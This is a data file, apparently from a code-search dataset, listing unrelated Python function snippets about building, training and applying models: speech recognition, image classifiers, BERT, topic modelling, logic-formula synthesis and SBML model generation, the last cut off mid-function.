np.linspace(sigma_uniform_lower,sigma_uniform_upper,num_prior_pts)]\n prior_xs = [np.linspace(pic50_exp_lower-2, pic50_exp_lower+23, num_prior_pts),\n np.concatenate(([hill_uniform_lower-2,hill_uniform_lower],\n np.linspace(hill_uniform_lower, hill_uniform_upper, num_prior_pts),\n [hill_uniform_upper,hill_uniform_upper+2])),\n np.linspace(0, 25, num_prior_pts)]\n #prior_pdfs = [st.logistic.pdf(prior_xs[0],loc=mu,scale=s),\n # st.fisk.pdf(prior_xs[1],c=beta,scale=alpha),\n # np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower)]\n #prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n # np.concatenate(([0,0],np.ones(num_prior_pts) / (1. * hill_uniform_upper - hill_uniform_lower),[0,0])),\n # np.concatenate(([0, 0], np.ones(num_prior_pts) / (1. * sigma_uniform_upper - sigma_uniform_lower), [0, 0]))]\n prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n np.concatenate(([0,0],np.ones(num_prior_pts) / (1. * hill_uniform_upper - hill_uniform_lower),[0,0])),\n st.gamma.pdf(prior_xs[2], sigma_shape, loc=sigma_loc, scale=sigma_scale)]", "def run_deep_speech():\n global FLAGS\n tf.set_random_seed(FLAGS.seed)\n # Data precessing\n tf.logging.info(\"Data Processing...\")\n train_speech_dataset = generate_dataset(FLAGS.data_dir, partition=\"train\")\n eval_speech_dataset = generate_dataset(FLAGS.data_dir, partition=\"dev\")\n\n # Number of label classes. Label string is \"[a-z]' -\"\n num_classes = len(train_speech_dataset.speech_labels)\n\n # not available in 1.4\n distribution_strategy = distribution_utils.get_distribution_strategy(num_gpus=FLAGS.num_gpus)\n run_config = es.RunConfig(train_distribute=distribution_strategy, session_config=get_session_config())\n\n estimator = es.Estimator(\n model_fn=model_fn, model_dir=FLAGS.model_dir, config=run_config, params={\"num_classes\": num_classes})\n\n run_params = {\n \"batch_size\": FLAGS.batch_size,\n \"train_epochs\": FLAGS.train_epochs,\n \"rnn_hidden_size\": FLAGS.rnn_hidden_size,\n \"rnn_hidden_layers\": FLAGS.rnn_hidden_layers,\n \"rnn_type\": FLAGS.rnn_type,\n \"is_bidirectional\": FLAGS.is_bidirectional,\n \"use_bias\": FLAGS.use_bias\n }\n\n benchmark_logger = logger.get_benchmark_logger()\n benchmark_logger.log_run_info(\n model_name=\"deep_speech\", dataset_name=\"LibriSpeech\", run_params=run_params, test_id=FLAGS.benchmark_test_id)\n\n train_hooks = hooks_helper.get_train_hooks(FLAGS.hooks, model_dir=FLAGS.model_dir, batch_size=FLAGS.batch_size)\n per_replica_batch_size = distribution_utils.per_replica_batch_size(FLAGS.batch_size, FLAGS.num_gpus)\n\n def input_fn_train():\n return train_speech_dataset.input_fn(batch_size=per_replica_batch_size)\n\n def input_fn_eval():\n return eval_speech_dataset.input_fn(batch_size=per_replica_batch_size)\n\n # total_training_cycle = FLAGS.train_epochs // FLAGS.epochs_between_evals\n total_training_cycle = FLAGS.train_epochs\n\n for cycle_index in range(total_training_cycle):\n tf.logging.info(f\"Starting train cycle: {cycle_index + 1} / {total_training_cycle}\")\n\n # Perform batch_wise dataset shuffling\n train_speech_dataset.batch_wise_shuffle(FLAGS.batch_size)\n\n # Train\n estimator.train(input_fn=input_fn_train, hooks=train_hooks)\n\n # Evaluation\n tf.logging.info(\"Starting to evaluate...\")\n eval_results = evaluate_model(estimator, speech_labels=eval_speech_dataset.speech_labels,\n entries=eval_speech_dataset.entries, input_fn_eval=input_fn_eval)\n\n # Log the WER and CER results.\n benchmark_logger.log_evaluation_result(eval_results)\n tf.logging.info(\n f\"Iteration {cycle_index + 1}: WER = {eval_results[_WER_KEY]:.2f}, CER = {eval_results[_CER_KEY]:.2f}\")", "def apply_model(model: BaseModel, **kwargs):\n raise NotImplementedError(f'Unknown model: {model}')", "def synthesize_rf(self, model, mu=1.0):\n ndim = len(model.shape)\n dtype = self._get_dtype()\n \n if(ndim == 1):\n model1 = np.ascontiguousarray(model.reshape((1,1,model.size)), dtype=dtype)\n elif(ndim == 3):\n model1 = model\n else:\n print(\"MilneEddington::synthesize_rf: ERROR, the input model must have 1 or 3 dimensions\")\n return None\n\n if(model1.shape[2] != 9):\n print(\"MilneEddington::synthesize_rf: ERROR, input model has npar={0}, should be 9\".format(model1.shape[2]))\n return None\n\n isContiguous = model1.flags['C_CONTIGUOUS']\n if(not isContiguous or model1.dtype != dtype):\n model1 = np.ascontiguousarray(model1, dtype=dtype)\n\n \n \n return self.Me.synthesize_RF(model, mu=mu)", "def set_model_func(self, model):\n if model == 'SI':\n import cavefish_dadi.Models.si\n return cavefish_dadi.Models.si.si\n elif model == 'SC':\n import cavefish_dadi.Models.sc\n return cavefish_dadi.Models.sc.sc\n elif model == 'IM':\n import cavefish_dadi.Models.im\n return cavefish_dadi.Models.im.im\n elif model == 'AM':\n import cavefish_dadi.Models.am\n return cavefish_dadi.Models.am.am\n elif model == 'SC2M':\n import cavefish_dadi.Models.sc2m\n return cavefish_dadi.Models.sc2m.sc2m\n elif model == 'IM2M':\n import cavefish_dadi.Models.im2m\n return cavefish_dadi.Models.im2m.im2m\n elif model == 'AM2M':\n import cavefish_dadi.Models.am2m\n return cavefish_dadi.Models.am2m.am2m\n else:\n return None", "def build_model(self):\n raise NotImplementedError", "def _synthesize_for_model(model: Model) -> Formula:\n assert is_model(model)\n assert len(model.keys()) > 0\n # Task 2.6\n vars = list(variables(model))\n formula =_synthesize_for_model_helper(model, vars, 0)\n return formula", "def get_model_fn(model, num_classes, spatial_res):\n\n model = model.lower()\n if model == \"cnn\": return get_cnn_fn(model, num_classes)\n if model in RESNET_FNS: return get_resnet_fn(model, num_classes, spatial_res)\n if model in VIT_FNS: return get_vit_fn(model, num_classes, spatial_res)\n if model in EFFICIENTNET_FNS: return get_efficientnet_fn(model, num_classes,\n spatial_res)\n raise ValueError(f\"Model {model} not recognized.\")", "def generate_model(corpus, dictionary):\n NUM_TOPICS = 5\n ldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics=NUM_TOPICS,\n id2word=dictionary, passes=15)\n ldamodel.save('model5.gensim')", "def model_fn(model_dir):\n ctx = mx.cpu()\n net = gcv.model_zoo.get_model(\n 'yolo3_darknet53_voc',\n pretrained=False,\n ctx=ctx)\n batchify = gcv.data.batchify._stack_arrs\n net.load_parameters(os.path.join(model_dir, 'yolo3_darknet53_voc.params'), mx.cpu(0))\n net.hybridize()\n def image_transform(im_bytes):\n \"\"\"\n Apply image transformation to raw byte images\n \"\"\"\n img = [mx.image.imdecode(bytes.fromhex(im.lstrip('0x'))) for im in im_bytes]\n out = gcv.data.transforms.presets.yolo.transform_test(img)\n return out[0]\n\n return net, image_transform, batchify", "def model_fn(model_dir):\n\n model = BertForSequenceClassification.from_pretrained('cl-tohoku/bert-base-japanese-whole-word-masking', \n num_labels=1)\n model = torch.nn.DataParallel(model)\n with open(os.path.join(model_dir, 'model.pth'), 'rb') as f:\n model.load_state_dict(torch.load(f))\n \n return {\"net\": model, \"tokenizer\": tokenizer}", "def train_callback(self, model):\n pass", "def train_callback(self, model):\n pass", "def initialize_model(model_name, num_classes, feature_extract, verbose=False):\n\n model_ft = None\n\n if model_name == \"resnet\":\n \"\"\" Resnet18\n \"\"\"\n model_ft = models.resnet18(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"alexnet\":\n \"\"\" Alexnet\n \"\"\"\n model_ft = models.alexnet(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"vgg\":\n \"\"\" VGG11_bn\n \"\"\"\n model_ft = models.vgg11_bn(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"squeezenet\":\n \"\"\" Squeezenet\n \"\"\"\n with warnings.catch_warnings(): # temporarily suppress warnings about deprecated functions\n warnings.simplefilter(\"ignore\")\n model_ft = models.squeezenet1_0(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1, 1), stride=(1, 1))\n model_ft.num_classes = num_classes\n\n elif model_name == \"densenet\":\n \"\"\" Densenet\n \"\"\"\n model_ft = models.densenet121(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"inception\":\n \"\"\" Inception v3\n Be careful, expects (299,299) sized images and has auxiliary output\n \"\"\"\n model_ft = models.inception_v3(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n else: # Unreachable\n exit()\n\n # Gather the parameters to be optimized\n params_to_update = list(filter(lambda p: p.requires_grad, model_ft.parameters()))\n\n # Print model info\n if verbose:\n print()\n print(model_ft)\n print()\n print(\"Params to learn:\")\n for name, param in model_ft.named_parameters():\n if param.requires_grad:\n print('\\t', name)\n\n return model_ft, params_to_update", "def synthesize(model, mspec, spk):\n if use_cuda:\n model = model.cuda()\n\n model.eval()\n\n sequence = np.array(mspec)\n sequence = Variable(torch.from_numpy(sequence)).unsqueeze(0)\n spk = np.array(spk)\n spk = Variable(torch.from_numpy(spk)).unsqueeze(0)\n\n if use_cuda:\n sequence = sequence.cuda() \n spk = spk.cuda()\n\n with torch.no_grad():\n model.forward_getlatents(sequence)\n mel_outputs, linear_outputs, = model.forward_eval(sequence, spk)\n\n linear_output = linear_outputs[0].cpu().data.numpy()\n spectrogram = audio.denormalize(linear_output)\n waveform = audio.inv_spectrogram(linear_output.T)\n\n return waveform", "def model(self) -> Type[Model]:", "def synthesize_for_model(model: Model) -> Formula:\r\n # the idea is -> first step put the var or ~var\r\n # than each time do - > add '(' at first\r\n # '(' + the_string '&' + the_new_string + ')'\r\n \"\"\"\r\n We solve this equation by using CNF.\r\n every var that is false we doing ~var, and connecting all the var by '&'\r\n and this will provide us with formula which is true just \r\n for the given model\r\n \"\"\"\r\n assert is_model(model)\r\n # Task 2.6\r\n first = True\r\n str_formula = \"\"\r\n for key, value in model.items():\r\n if first:\r\n first = False\r\n if not value:\r\n str_formula += '~'\r\n str_formula += key\r\n else:\r\n str_formula = \"(\" + str_formula + \"&\"\r\n if not value:\r\n str_formula += '~'\r\n str_formula += key\r\n str_formula += \")\"\r\n # creating a list, that list[0] contain the string, because that what\r\n # list_to_string function is required\r\n list_of_string = list()\r\n list_of_string.append(str_formula)\r\n return str_to_form(list_of_string)", "def __call__(self, x, **kwargs):\n return self.model(x)", "def create_model(data, cont, cat, target): \n\n cont_features = '+'.join(cont)\n\n cat_features = '+'.join([f'C({x})' for x in cat])\n\n f = f'{target}~+{cont_features}+{cat_features}'\n\n print(f)\n\n model = smf.ols(formula=f, data=data).fit()\n \n diagnose_model(model)\n \n return model", "def build_model(self, **kwargs):\n raise NotImplementedError()", "def __init__(self):\n self.name = \"Schaffer\"\n objectives = [o_sh_1, o_sh_2]\n decisions = [Decision(-10 ** 5, 10 ** 5)]\n Model.__init__(self, objectives, None, decisions)", "def model(flags):\n input_audio = tf.keras.layers.Input(\n shape=modes.get_input_data_shape(flags, modes.Modes.TRAINING),\n batch_size=flags.batch_size)\n net = input_audio\n\n if flags.preprocess == 'raw':\n # it is a self contained model, user need to feed raw audio only\n net = speech_features.SpeechFeatures(\n speech_features.SpeechFeatures.get_params(flags))(\n net)\n\n time_size, feature_size = net.shape[1:3]\n\n channels = parse(flags.channels)\n\n net = tf.keras.backend.expand_dims(net)\n\n if flags.debug_2d:\n conv_kernel = first_conv_kernel = (3, 3)\n else:\n net = tf.reshape(\n net, [-1, time_size, 1, feature_size]) # [batch, time, 1, feature]\n first_conv_kernel = (3, 1)\n conv_kernel = parse(flags.kernel_size)\n\n net = tf.keras.layers.Conv2D(\n filters=channels[0],\n kernel_size=first_conv_kernel,\n strides=1,\n padding='same',\n activation='linear')(\n net)\n net = tf.keras.layers.BatchNormalization(\n momentum=flags.bn_momentum,\n center=flags.bn_center,\n scale=flags.bn_scale,\n renorm=flags.bn_renorm)(\n net)\n net = tf.keras.layers.Activation('relu')(net)\n\n if parse(flags.pool_size):\n net = tf.keras.layers.AveragePooling2D(\n pool_size=parse(flags.pool_size), strides=flags.pool_stride)(\n net)\n\n channels = channels[1:]\n\n # residual blocks\n for n in channels:\n if n != net.shape[-1]:\n stride = 2\n layer_in = tf.keras.layers.Conv2D(\n filters=n,\n kernel_size=1,\n strides=stride,\n padding='same',\n activation='linear')(\n net)\n layer_in = tf.keras.layers.BatchNormalization(\n momentum=flags.bn_momentum,\n center=flags.bn_center,\n scale=flags.bn_scale,\n renorm=flags.bn_renorm)(\n layer_in)\n layer_in = tf.keras.layers.Activation('relu')(layer_in)\n else:\n layer_in = net\n stride = 1\n\n net = tf.keras.layers.Conv2D(\n filters=n,\n kernel_size=conv_kernel,\n strides=stride,\n padding='same',\n activation='linear')(\n net)\n net = tf.keras.layers.BatchNormalization(\n momentum=flags.bn_momentum,\n center=flags.bn_center,\n scale=flags.bn_scale,\n renorm=flags.bn_renorm)(\n net)\n net = tf.keras.layers.Activation('relu')(net)\n\n net = tf.keras.layers.Conv2D(\n filters=n,\n kernel_size=conv_kernel,\n strides=1,\n padding='same',\n activation='linear')(\n net)\n net = tf.keras.layers.BatchNormalization(\n momentum=flags.bn_momentum,\n center=flags.bn_center,\n scale=flags.bn_scale,\n renorm=flags.bn_renorm)(\n net)\n\n # residual connection\n net = tf.keras.layers.Add()([net, layer_in])\n net = tf.keras.layers.Activation('relu')(net)\n\n net = tf.keras.layers.AveragePooling2D(\n pool_size=net.shape[1:3], strides=1)(\n net)\n\n net = tf.keras.layers.Dropout(rate=flags.dropout)(net)\n\n # fully connected layer\n net = tf.keras.layers.Conv2D(\n filters=flags.label_count,\n kernel_size=1,\n strides=1,\n padding='same',\n activation='linear')(\n net)\n\n net = tf.reshape(net, shape=(-1, net.shape[3]))\n return tf.keras.Model(input_audio, net)", "def model_creator(config):\n return nn.Linear(1, 1)", "def recog_v2(args):\n logging.warning(\"experimental API for custom LMs is selected by --api v2\")\n if args.batchsize > 1:\n raise NotImplementedError(\"multi-utt batch decoding is not implemented\")\n if args.streaming_mode is not None:\n raise NotImplementedError(\"streaming mode is not implemented\")\n if args.word_rnnlm:\n raise NotImplementedError(\"word LM is not implemented\")\n\n set_deterministic_pytorch(args)\n model, train_args = load_trained_model(args.model)\n\n # add lang2ph to the model\n if args.mask_phoneme:\n logging.warning(f'mask phoneme and create lang2ph for model')\n assert args.lang2ph is not None\n with open(args.lang2ph, 'r') as f:\n model.lang2ph = json.load(f)\n\n model.lang2phid = {}\n for lang, phones in model.lang2ph.items(): \n phoneset = set(phones + ['<blank>', '<unk>', '<space>', '<eos>'])\n phoneset = phoneset.intersection(model.args.char_list)\n model.lang2phid[lang] = list(map(model.args.char_list.index, phoneset))\n # model.lang2phid[lang] = list(map(model.args.char_list.index, phones+['<blank>', '<unk>', '<space>', '<eos>']))\n \n model.ctc.lang2phid = model.lang2phid\n logging.warning(f'model lang2phid {model.lang2phid}')\n\n assert isinstance(model, ASRInterface)\n model.eval()\n\n load_inputs_and_targets = LoadInputsAndTargets(\n mode=\"asr\",\n load_output=False,\n sort_in_input_length=False,\n preprocess_conf=train_args.preprocess_conf\n if args.preprocess_conf is None\n else args.preprocess_conf,\n preprocess_args={\"train\": False},\n )\n logging.warning(f'args.rnnlm: {args.rnnlm}')\n\n if args.rnnlm:\n lm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)\n # NOTE: for a compatibility with less than 0.5.0 version models\n lm_model_module = getattr(lm_args, \"model_module\", \"default\")\n lm_class = dynamic_import_lm(lm_model_module, lm_args.backend)\n lm = lm_class(len(train_args.char_list), lm_args)\n torch_load(args.rnnlm, lm)\n lm.eval()\n else:\n lm = None\n\n if args.ngram_model:\n from espnet.nets.scorers.ngram import NgramFullScorer\n from espnet.nets.scorers.ngram import NgramPartScorer\n\n if args.ngram_scorer == \"full\":\n ngram = NgramFullScorer(args.ngram_model, train_args.char_list)\n else:\n ngram = NgramPartScorer(args.ngram_model, train_args.char_list)\n else:\n ngram = None\n\n scorers = model.scorers()\n \n scorers[\"lm\"] = lm\n scorers[\"ngram\"] = ngram\n scorers[\"length_bonus\"] = LengthBonus(len(train_args.char_list))\n weights = dict(\n decoder=1.0 - args.ctc_weight,\n ctc=args.ctc_weight,\n lm=args.lm_weight,\n ngram=args.ngram_weight,\n length_bonus=args.penalty,\n )\n beam_search = BeamSearch(\n beam_size=args.beam_size,\n vocab_size=len(train_args.char_list),\n weights=weights,\n scorers=scorers,\n sos=model.sos,\n eos=model.eos,\n token_list=train_args.char_list,\n pre_beam_score_key=None if args.ctc_weight == 1.0 else \"full\",\n )\n # TODO(karita): make all scorers batchfied\n if args.batchsize == 1:\n non_batch = [\n k\n for k, v in beam_search.full_scorers.items()\n if not isinstance(v, BatchScorerInterface)\n ]\n if len(non_batch) == 0:\n beam_search.__class__ = BatchBeamSearch\n logging.info(\"BatchBeamSearch implementation is selected.\")\n else:\n logging.warning(\n f\"As non-batch scorers {non_batch} are found, \"\n f\"fall back to non-batch implementation.\"\n )\n\n if args.ngpu > 1:\n raise NotImplementedError(\"only single GPU decoding is supported\")\n if args.ngpu == 1:\n device = \"cuda\"\n else:\n device = \"cpu\"\n dtype = getattr(torch, args.dtype)\n logging.info(f\"Decoding device={device}, dtype={dtype}\")\n model.to(device=device, dtype=dtype).eval()\n beam_search.to(device=device, dtype=dtype).eval()\n\n js = read_json_data(model.args, args.recog_json)\n # read json data\n # with open(args.recog_json, \"rb\") as f:\n # js = json.load(f)[\"utts\"]\n\n random.seed(args.seed)\n items = list(js.items())\n random.shuffle(items)\n js = OrderedDict(items[:args.recog_size])\n logging.warning(f'data json len {len(js)}')\n\n import re\n def get_lang(name):\n s = name.split('_')[0]\n s = re.sub(r'\\d+$', '', s.split('-')[0]) if re.search('[a-zA-Z]+', s) else s\n return s\n\n new_js = {}\n with torch.no_grad():\n for idx, name in enumerate(js.keys(), 1):\n logging.info(\"(%d/%d) decoding \" + name, idx, len(js.keys()))\n\n lang_labels = None\n lang_labels_for_masking = None\n if args.lang_label:\n lang_label = get_lang(name)\n if args.mask_phoneme:\n lang_labels_for_masking = [lang_label] # true lang labels\n if args.fake_lang_label:\n lang_labels = [args.fake_lang_label]\n\n batch = [(name, js[name])]\n feat = load_inputs_and_targets(batch)[0][0]\n enc = model.encode(torch.as_tensor(feat).to(device=device, dtype=dtype), lang_labels=lang_labels)\n\n nbest_hyps = beam_search(\n x=enc, maxlenratio=args.maxlenratio, minlenratio=args.minlenratio, \n mask_phoneme=args.mask_phoneme, lang_labels_for_masking=lang_labels_for_masking\n )\n\n nbest_hyps = [\n h.asdict() for h in nbest_hyps[: min(len(nbest_hyps), args.nbest)]\n ]\n new_js[name] = add_results_to_json(\n js[name], nbest_hyps, train_args.char_list\n )\n\n with open(args.result_label, \"wb\") as f:\n f.write(\n json.dumps(\n {\"utts\": new_js}, indent=4, ensure_ascii=False, sort_keys=True\n ).encode(\"utf_8\")\n )", "def models(r, model):\n\n\tif model==\"PREM\":\n\t\treturn model_prem(r)\n\n\telif model==\"PREM_iso\":\n\t\treturn model_prem_iso(r)\n\n\telif model==\"ONELAYER\":\n\t\treturn model_onelayer(r)\n\n\telif model==\"ONELAYER_pert\":\n\t\treturn model_onelayer_pert(r)\n\n\telif model==\"GUTENBERG\":\n\t\treturn model_gutenberg(r)", "def model_fn(features, labels, mode, params):\n # obtain the data\n _info('*** Features ***')\n for name in sorted(features.keys()):\n tf.logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n\n input_ids = features['input_ids'] # [batch_size, seq_length]\n input_mask = features['input_mask'] # [batch_size, seq_length]\n\n # if mode != tf.estimator.ModeKeys.PREDICT:\n # # segment_idx = features['segment_dis']\n # masked_lm_positions = features['masked_lm_positions'] # [batch_size, seq_length], specify the answer\n # masked_lm_ids = features['masked_lm_ids'] # [batch_size, answer_seq_length], specify the answer labels\n # masked_lm_weights = features['masked_lm_weights'] # [batch_size, seq_length], [1, 1, 0], 0 refers to the mask\n # # next_sentence_labels = features['next_sentence_labels']\n # else:\n masked_lm_positions = features['masked_lm_positions']\n masked_lm_ids = features['masked_lm_ids']\n masked_lm_weights = features['masked_lm_weights']\n\n if bert_config.train_type == 'seq2seq':\n _info('Training seq2seq task.')\n elif bert_config.train_type == 'lm':\n _info('Training language model task.')\n \n # build model\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n model = BertModel(\n config=bert_config,\n is_training=is_training,\n input_ids=input_ids,\n input_mask=input_mask)\n \n # compute loss\n loss, per_loss, log_probs, logits = get_masked_lm_output(bert_config,\n model.get_sequence_output(),\n model.embedding_table,\n model.projection_table,\n masked_lm_positions,\n masked_lm_ids,\n masked_lm_weights,\n mode)\n \n if mode == tf.estimator.ModeKeys.PREDICT:\n masked_lm_predictions = tf.reshape(tf.argmax(log_probs, axis=-1, output_type=tf.int32), [-1])\n output_spec = tf.estimator.EstimatorSpec(mode, predictions=masked_lm_predictions)\n else:\n if mode == tf.estimator.ModeKeys.TRAIN: \n # restore from the checkpoint,\n # tf.estimator automatically restore from the model typically,\n # maybe here is for restore some pre-trained parameters\n tvars = tf.trainable_variables()\n initialized_variable_names = {}\n if init_checkpoint:\n (assignment_map, initialized_variable_names) = get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n\n _info('*** Trainable Variables ***')\n for var in tvars:\n init_string = ''\n if var.name in initialized_variable_names:\n init_string = ', *INIT_FROM_CKPT*'\n _info('name = {}, shape={}{}'.format(var.name, var.shape, init_string))\n \n train_op = optimization.create_optimizer(\n loss, bert_config.learning_rate, num_train_steps, bert_config.lr_limit)\n\n # learning_rate = tf.train.polynomial_decay(bert_config.learning_rate,\n # tf.train.get_or_create_global_step(),\n # num_train_steps,\n # end_learning_rate=0.0,\n # power=1.0,\n # cycle=False)\n # optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n # gradients = tf.gradients(loss, tvars, colocate_gradients_with_ops=True)\n # clipped_gradients, _ = tf.clip_by_global_norm(gradients, 5.0)\n # train_op = optimizer.apply_gradients(zip(clipped_gradients, tvars), global_step=tf.train.get_global_step())\n output_spec = tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)\n elif mode == tf.estimator.ModeKeys.EVAL:\n is_real_example = tf.ones(tf.shape(masked_lm_ids), dtype=tf.float32)\n \n def metric_fn(loss, label_ids, logits, is_real_example):\n \"\"\"\n Args:\n loss: tf.float32.\n label_ids: [b, s].\n logits: [b, s, v].\n \"\"\"\n # [b * s, v]\n logits = tf.reshape(logits, [-1, logits.shape[-1]])\n # [b * s, 1]\n predictions = tf.argmax(logits, axis=-1, output_type=tf.int32)\n # [b * s]\n label_ids = tf.reshape(label_ids, [-1])\n accuracy = tf.metrics.accuracy(\n labels=label_ids, predictions=predictions)\n loss = tf.metrics.mean(values=loss)\n return {'eval_accuracy': accuracy, 'eval_loss': loss}\n \n eval_metrics = metric_fn(loss, masked_lm_ids, logits, is_real_example)\n output_spec = tf.estimator.EstimatorSpec(mode=mode, loss=loss, eval_metric_ops=eval_metrics)\n\n return output_spec", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def __init__(self, model_name):\n\n self.name = model_name\n self.words = {}\n self.word_lengths = {}\n self.stems={}\n self.sentence_lengths={}\n self.endings={}\n self.total = 0", "def __init__(self, model, src_vocab, tgt_vocab):\n self.max_length = 120\n if torch.cuda.is_available():\n self.model = model.cuda()\n else:\n self.model = model.cpu()\n self.model.eval()\n self.src_vocab = src_vocab\n self.tgt_vocab = tgt_vocab", "def _build_model(self):\n raise NotImplementedError()", "def reconstruct_input_ext(self, model_in):", "def keras_model_fn(model_config, vocab_size, embedding_size, embeddings):\n ## hyperparams\n model_name = model_config['model_name']\n num_class = model_config['num_class']\n lstm_hs = model_config['lstm_hs']\n gru_hs = model_config['gru_hs']\n learning_rate = model_config['learning_rate']\n \n ## build model - , weights=[embeddings[1]]\n inputs = ks.Input(shape=(None,), dtype='int32', name='inputs')\n embedded_sequences_ft1 = layers.Embedding(vocab_size, embedding_size, trainable = True, mask_zero = False)(inputs)\n embedded_sequences_ft2 = layers.Embedding(vocab_size, embedding_size, trainable = True, mask_zero = False)(inputs)\n concat_embed = layers.concatenate([embedded_sequences_ft1 ,embedded_sequences_ft2])\n concat_embed = layers.SpatialDropout1D(0.5)(concat_embed)\n x = layers.Bidirectional(layers.CuDNNLSTM(lstm_hs, return_sequences = True))(concat_embed)\n x, x_h, x_c = layers.Bidirectional(layers.CuDNNGRU(gru_hs, return_sequences = True, return_state = True))(x)\n x_1 = layers.GlobalMaxPool1D()(x)\n x_2 = layers.GlobalAvgPool1D()(x)\n x_out = layers.concatenate([x_1 ,x_2, x_h])\n x_out = layers.BatchNormalization()(x_out)\n outputs = layers.Dense(num_class, activation = 'softmax', name = 'outputs')(x_out) # outputs\n model = ks.Model(inputs, outputs, name = model_name)\n \n ## compile\n model.compile(loss = 'categorical_crossentropy', \n optimizer = ks.optimizers.Adam(lr=learning_rate, clipnorm=.25, beta_1=0.7, beta_2=0.99), \n metrics = ['categorical_accuracy', ks.metrics.TopKCategoricalAccuracy(k=3)]) # metric what?\n return model", "def solve(self, model, sentence):\r\n if model == \"Simple\":\r\n return self.simple(sentence)\r\n elif model == \"Complex\":\r\n return self.complex(sentence)\r\n elif model == \"HMM\":\r\n return self.hmm(sentence)\r\n else:\r\n print(\"Unknown algorithm!\")", "def apply_model(gmm_model, speech_array):\n # given 1 speaker (1 file), figure out\n # assume that each time stamp's log-probs are INDEPENDENT\n return np.sum(gmm_model.score(speech_array))", "def model(self) -> str:\n ...", "def __init__(self, model_name):\n self.name = model_name\n self.words = {}\n self.word_lengths = {}\n self.sentence_lengths = {}\n self.stems = {}\n self.commas_per_sentence = {}", "def GenerateModel(modelData, outputFilePath, objectName = 'SBMLmodel'):\n #The library mathFuncs serves to both only allow functions supported\n #functions in SBML/user defined functions, but also the python equivalent\n \n np.set_printoptions(threshold=sys.maxsize)\n \n \n \n outputFile = open(outputFilePath, \"w\")\n\n parameters = modelData.parameters\n compartments = modelData.compartments\n species = modelData.species\n reactions = modelData.reactions\n functions = modelData.functions\n \n assignmentRules = modelData.assignmentRules\n rateRules = modelData.rateRules\n initialAssignments = modelData.initialAssignments\n \n mathFuncs = {'abs' : 'abs',\n 'max' : 'max',\n 'min' : 'min',\n 'pow' : 'pow',\n 'exp' : 'math.exp',\n 'floor' : 'np.floor',\n 'ceiling' : 'math.ceil',\n 'exp' : 'math.exp',\n 'ln' : 'math.log',\n 'log' : 'math.log10',\n 'factorial' : 'math.factorial',\n 'sqrt' : 'math.sqrt',\n \n 'eq' : 'operator.eq',\n 'neq' : 'operator.ne',\n 'gt' : 'operator.gt',\n 'lt' : 'operator.lt',\n 'geq' : 'operator.ge',\n 'leq' : 'operator.le',\n \n 'and' : 'operator.and_',\n 'or' : 'operator.or_',\n 'xor' : 'operator.xor_',\n 'not' : 'operator.not_',\n \n 'sin' : 'np.sin',\n 'cos' : 'np.cos',\n 'tan' : 'np.tan',\n 'sec' : '1/np.cos',\n 'csc' : '1/np.sin',\n 'cot' : '1/np.tan',\n 'sinh' : 'np.sinh',\n 'cosh' : 'np.cosh',\n 'tanh' : 'np.tanh',\n 'sech' : '1/np.cosh',\n 'csch' : '1/np.sinh',\n 'coth' : '1/np.tanh',\n 'arcsin' : 'np.arcsin',\n 'arccos' : 'np.arccos',\n 'arctan' : 'np.arctan',\n 'arcsinh' : 'np.arcsinh',\n 'arccosh' : 'np.arccosh',\n 'arctanh' : 'np.arctanh',\n \n 'true' : 'True',\n 'false' : 'False',\n 'notanumber' : 'np.nan',\n 'pi' : 'np.pi',\n 'infinity' : 'np.inf',\n 'exponentiale' : 'np.e',\n 'piecewise' : 'Piecewise'\n } \n #Add in user defined functions\n# for function in functions:\n# mathFuncs[function] = \"self.\" + function\n\t\t\n #Set up stoichCoeffMat, a matrix of stoichiometric coefficients for solving the reactions\n reactantCounter = 0\n reactantIndex = {}\n reactionCounter = 0\n reactionIndex = {}\n \n rateRuleVars = []\n rateParams = 0\n for specie in species:\n reactantIndex[specie] = reactantCounter\n reactantCounter += 1\n for key, rateRule in rateRules.items():\n if rateRule.variable in parameters or rateRule.variable in compartments:\n rateParams += 1\n reactantIndex[rateRule.variable] = reactantCounter\n reactantCounter += 1\n rateRuleVars.append(rateRule.variable)\n elif rateRule.variable in species:\n pass\n else:\n raise Exception(\"Rate Rule adjusting something other than specie amount, parameter value, or compartment size.\")\n\n \t\t\n stoichCoeffMat = np.zeros([len(species) + rateParams, max(len(reactions),1)])\n \n for rxnId in reactions:\n reactionIndex[rxnId] = reactionCounter\n reactionCounter += 1\n reaction = reactions[rxnId]\n 